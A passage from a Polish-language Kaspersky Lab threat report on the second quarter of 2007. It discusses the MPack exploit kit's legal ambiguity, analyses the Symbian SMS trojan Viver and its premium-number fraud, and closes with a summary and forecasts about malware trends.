Naszym zdaniem największym problem jest to, że pociągniecie autorów Mpacka do odpowiedzialności karnej jest bardzo trudne. Z technicznego punktu widzenia, prowadzą oni jedynie nielegalny biznes i nie odprowadzają podatków od dochodów ze sprzedaży. Nie włamują się na strony internetowe w celu umieszczenia na nich ramek pływających - robią to ich klienci. Nie rozprzestrzeniają trojanów - robią to ich klienci. Biorą jedynie exploity z otwartych źródeł, które są publikowane na setkach stron internetowych w celu zapewnienia bezpieczeństwa IT i zostały znalezione przez innych ludzi. Tworzą z tych exploitów kolekcje i nie ponoszą odpowiedzialności za to, w jaki sposób zostaną następnie wykorzystane.

Przyjrzyjmy się znanemu projektowi bezpieczeństwa IT - Metasploit Framework. Autorzy Mpacka robią dokładnie to samo co HD Moore (autor projektu Metasploit). Jedyna różnica polega na tym, że jeden z nich mówi uczciwie, do czego mogą zostać wykorzystane kolekcje exploitów, a drugi twierdzi, że ich produkt jest narzędziem administracyjnym niezbędnym do testowania bezpieczeństwa systemów komputerowych.

W tym miejscu dochodzimy do ciągle aktualnego pytania: czy opublikowanie informacji robi więcej dobrego czy złego? Nie mamy zamiaru wdawać się w dyskusję na ten temat, opowiadając się po jednej ze stron. Na razie stwierdzamy jedynie fakty, obiecujemy jednak powrócić do tej kwestii, przedstawiając naszą opinię odnośnie obecnej sytuacji "czarne kapelusze" kontra "białe kapelusze".

Viver

W połowie maja znaleźliśmy trzy warianty nowego trojana stworzonego dla telefonów komórkowych: Trojan-SMS.SymbOS.Viver. Trojan ten wysyła wiadomości tekstowe na płatne numery. W rezultacie, ofiara zostaje obciążona kwotą pieniędzy, które są następnie przelewane na konto szkodliwego użytkownika.

Trojany te nie są niczym nowym: pierwsze podobne szkodniki działające na praktycznie wszystkich telefonach komórkowych obsługujących Javę (tj. RedBrowser, Wesber) wykryliśmy w zeszłym roku. Vivera odróżnia od innych takich trojanów to, że został on napisany specjalnie dla telefonów działających na platformie Symbian i jest pierwszym trojanem wykorzystującym wiadomości tekstowe, który atakuje smartfony.

Analiza pomoże nam ustalić, w jaki sposób trojan ten rozprzestrzenia się, a szkodliwi użytkownicy dostają pieniądze.

Trojany zostały umieszczone na popularnej rosyjskiej stronie internetowej skierowanej do użytkowników smartfonów, dimonvideo.ru, w sekcji wymiany plików. Pliki mogą być dodawane przez wszystkich zarejestrowanych użytkowników strony.

Jak zwykle, trojany oferowane były jako przydatne programy narzędziowe, takie jak program do obróbki zdjęć, wideo, codec itd. Po tym, jak zostanie zainstalowany w smartfonie, trojan wysyła wiadomość tekstową na numer 1055. Koszt wiadomości wynosi 177 rubli (około 7 dolarów amerykańskich).

Numer 1055 jest bardzo interesujący. Już wcześniej został wykorzystany przez rosyjskich oszustów dokonujących kradzieży za pośrednictwem telefonów komórkowych. Osoby te wciąż nie zostały ukarane...

W jaki sposób to działa?

Wiadomo, że operatorzy telefonii komórkowej wydzierżawiają krótkie numery - jednak koszty są zbyt wysokie dla osoby prywatnej. Istnieją dostawcy treści, którzy wydzierżawiają takie krótkie numery i poddzierżawiają je z określonym prefiksem.

Krótki numer 1055 jest dzierżawiony przez jednego takiego dostawcę treści z Rosji. Jeśli numer zostanie poddzierżawiony i wysłana na niego wiadomość tekstowa będzie zaczynała się na przykład od S1, dostawca systemu zabierze część opłaty za wiadomość, a resztę przeleje na konto osoby poddzierżawiającej ten numer, w tym przypadku S1. Operator telefonii komórkowej zgarnia 45 - 49% kosztu wiadomości, dostawca 10%. Reszta przypada osobie poddzierżawiającej numer, którą w tym przypadku jest oszust.

Wykazano, że jeden z wariantów Vivera zdołał zainfekować blisko 200 osób w ciągu zaledwie 24 godzin. Po tym czasie administrator strony usunął z niej informacje niezbędne do uzyskania dostępu do trojana. Z prostego rachunku wynika, że przy 200 ofiarach i początkowym koszcie wiadomości wynoszącym 177 rubli, szkodliwy użytkownik mógł "zarobić" do 14 000 rubli (ponad 500 amerykańskich dolarów) w ciągu jednego dnia.

Incydent ten po raz kolejny pokazuje, że współczesne technologie telefonii komórkowej nadal przyciągają uwagę cyberprzestępców. W tym przypadku plan opierał się na wykorzystaniu "krótkich numerów" oferowanych przez wielu dostawców telefonii komórkowej oraz dostawców treści. Niestety, możliwość "zabrania" pieniędzy z konta abonenta telefonii komórkowej bez jego wiedzy oraz bez uzyskania dodatkowego potwierdzenia stanowi słaby punkt współczesnych usług telefonii komórkowej, który psuje reputację dostawców telefonii komórkowej oraz dostawców treści.

W maju odnotowaliśmy trzy takie incydenty. Można się tylko domyślać, jak wiele nie zostało wykrytych. Niestety, nie dysponujemy danymi statystycznymi dla większości innych państw, a zagraniczne firmy antywirusowe nie donosiły o podobnych incydentach. Trudno uwierzyć w to, że jest to wyłącznie rosyjski problem.

Podsumowanie

Kluczowe wydarzenia omówione w tym raporcie, które miały miejsce w drugim kwartale 2007 r., z pewnością skłaniają do przemyśleń, wciąż jednak nie dają odpowiedzi na nasze pytanie: jaki będzie następy krok w rozwoju wirusów i zagrożeń informatycznych? Mimo pojawienia się nowych systemów operacyjnych (takich jak Windows Vista), nowych usług (treści dostarczane za pośrednictwem telefonów komórkowych) oraz urządzeń (iPhone), cybernetyczny światek przestępczy nadal cierpi na brak inicjatywy i wykorzystuje wypróbowane sposoby w celu wyrządzania szkód użytkownikom Internetu. Innowacje ograniczają się do niewielkiej liczby zagrożeń "proof-of-concept", których nikt dalej nie rozwija.

Ponadto, obserwujemy powrót do "źródeł": coraz częściej komputery padają ofiarą ataków DDoS oraz ataków wykorzystujących luki w zabezpieczeniach przeglądarek w celu przeniknięcia do systemu. Jedyną różnicę, jaką obserwujemy w stosunku do okresu sprzed trzech lat, jest prawdopodobnie fakt, że poczta elektroniczna nie jest już wykorzystywana jako główny sposób rozprzestrzeniania wirusów. Obecnie, jednym z kluczowych narzędzi dystrybucji szkodliwego oprogramowania są komunikatory internetowe. Kolejna różnica polega na tym, że nastąpił gwałtowny wzrost liczby trojanów atakujących użytkowników gier online.

Zagrożenia nie stają się "inteligentniejsze". Nastąpiła stagnacja, ponieważ twórcy szkodliwego oprogramowania koncentrują się na poprawkach kosmetycznych. Nadal nie wiemy, co może posłużyć jako katalizator zmiany charakteru wirusów na scenie globalnej, jak wcześniej opublikowanie systemu Windows 95, wyłonienie się robaków LoveLetter oraz Mellisa, pierwszego makrowirusa oraz epidemii robaków Lovesan i Mydoom.

Firmy antywirusowe znacznie ulepszyły swoje technologie i wprowadziły szereg nowych, nie przestając rozwijać całkowicie nowych metod.

Każda nowa wersja dowolnego produktu antywirusowego to coś więcej niż inny interfejs - oznacza ona kilka nowych funkcji, które znacznie ulepszają ochronę użytkownika. Obecnie klienci firm antywirusowych otrzymują o wiele efektywniejszą ochronę niż dwa lata temu. Średni czas przebywania większości nowych szkodliwych programów "na wolności" został skrócony do kilku godzin, rzadko kiedy wynosi kilka dni.

Spróbujmy przewidzieć, co zdarzy się w najbliższej przyszłości.

Szkodliwi użytkownicy będę próbowali sięgnąć poza "obszar ochrony" zapewniany przez rozwiązania antywirusowe - wymaga to większej aktywności w dziedzinach, które nie zostały jeszcze opanowane przez ochronę antywirusową dobrej jakości lub dziedzinach, w których z wielu powodów ochrona nie stanowi opcji. Jest to więcej niż pewne tam, gdzie utworzy się nowy front w wojnie informatycznej: gry online, blogi, komunikatory internetowe oraz sieci wymiany plików.

Źródło:
Kaspersky Lab